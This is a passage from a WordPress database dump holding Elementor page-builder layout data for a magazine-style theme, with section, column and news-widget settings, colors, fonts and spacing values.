ize\":100},\"elements\":[{\"id\":\"cfab1ec\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"4\",\"category\":[\"2\"],\"choose_column\":\"4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false}]'),(1302,459,'_elementor_version','0.4'),(1303,459,'_elementor_css','a:3:{s:4:\"time\";i:1508894332;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1305,460,'_elementor_edit_mode','builder'),(1306,460,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"pzcs9rp\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gifizg0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"65.004\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"ik44uj8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technlogie\",\"size\":\"medium\",\"align\":\"left\",\"title_color\":\"#04f7a2\",\"typography_font_size\":{\"unit\":\"px\",\"size\":1}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"4b0mlug\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"34.995\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"nk9gr2t\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"lpp590q\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"7oi6ecb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"hwmopge\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"82k0jjs\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"o6ou2yp\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"offset\":\"1\",\"category\":[\"2\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"700\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"use_meta_post_list_1\":\"\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"-15\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"g7mt24q\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0qdx6b8\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tatpigw\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cfab1ec\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"4\",\"category\":[\"2\"],\"choose_column\":\"4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false}]'),(1307,460,'_elementor_version','0.4'),(1308,460,'_elementor_css','a:3:{s:4:\"time\";i:1508895151;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1309,461,'_elementor_edit_mode','builder'),(1310,461,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\